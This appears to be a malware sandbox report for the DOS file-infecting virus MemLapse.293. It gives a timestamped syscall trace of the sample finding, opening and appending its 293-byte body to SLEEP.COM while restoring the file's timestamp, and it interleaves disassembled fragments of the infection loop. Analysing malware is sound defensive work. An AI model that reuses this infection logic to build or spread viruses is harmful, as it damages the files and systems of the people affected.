Sample viewer

vx.netlux.org/Virus.DOS.MemLapse.293

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:48:30.065267707Z 26 PC: 12a66 | Set disk transfer address
2018-12-17T22:48:30.067055726Z 78 PC: 12a6f | Find first file
2018-12-17T22:48:30.074244434Z 47 PC: 12a7a | Get disk transfer address
2018-12-17T22:48:30.075980566Z 79 PC: 12a6f | Find next file
2018-12-17T22:48:30.07900032Z 47 PC: 12a7a | Get disk transfer address
2018-12-17T22:48:30.082195193Z 67 PC: 12aa2 | Get or set file attributes
2018-12-17T22:48:30.098696708Z 61 PC: 12ab0 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:48:30.105384986Z 63 PC: 12ac9 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:48:30.111899687Z 66 PC: 12adb | Move file pointer
2018-12-17T22:48:30.113361153Z 87 PC: 12ae0 | Get or set file date and time
2018-12-17T22:48:30.114717932Z 64 PC: 12af3 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:48:30.118321934Z 66 PC: 12afc | Move file pointer
2018-12-17T22:48:30.119995128Z 64 PC: 12b07 | Write file or device (Write 293 bytes on handle 5)
2018-12-17T22:48:30.127340279Z 44 PC: 12b0c | Get time 0x12b0c: mov cl, dl
0x12b0e: mov al, cl
0x12b10: mov ax, 0x2c00
0x12b13: int 0x21
0x12b15: mov cl, dl
0x12b17: add cl, al
0x12b19: ror cl, 1
0x12b1b: xor ch, ch
0x12b1d: xor dx, dx
0x12b1f: mov ah, 0x40
0x12b21: int 0x21
0x12b23: mov cx, word ptr [0x229]
0x12b27: mov dx, word ptr [0x227]
0x12b2b: mov ax, 0x5701
0x12b2e: int 0x21
0x12b30: mov ah, 0x3e
0x12b32: int 0x21
0x12b34: mov ah, 0x4f
0x12b36: jmp 0x12a69
0x12b39: mov ah, 0x1a
2018-12-17T22:48:30.130637775Z 44 PC: 12b15 | Get time 0x12b15: mov cl, dl
0x12b17: add cl, al
0x12b19: ror cl, 1
0x12b1b: xor ch, ch
0x12b1d: xor dx, dx
0x12b1f: mov ah, 0x40
0x12b21: int 0x21
0x12b23: mov cx, word ptr [0x229]
0x12b27: mov dx, word ptr [0x227]
0x12b2b: mov ax, 0x5701
0x12b2e: int 0x21
0x12b30: mov ah, 0x3e
0x12b32: int 0x21
0x12b34: mov ah, 0x4f
0x12b36: jmp 0x12a69
0x12b39: mov ah, 0x1a
0x12b3b: mov dx, 0x80
0x12b3e: int 0x21
0x12b40: mov bx, 0x102
0x12b43: pop word ptr [bx]
2018-12-17T22:48:30.133801089Z 64 PC: 12b23 | Write file or device (Write 32 bytes on handle 5)
2018-12-17T22:48:30.136730182Z 87 PC: 12b30 | Get or set file date and time
2018-12-17T22:48:30.138991471Z 62 PC: 12b34 | Close file
2018-12-17T22:48:30.147424948Z 79 PC: 12a6f | Find next file
2018-12-17T22:48:30.150324095Z 26 PC: 12b40 | Set disk transfer address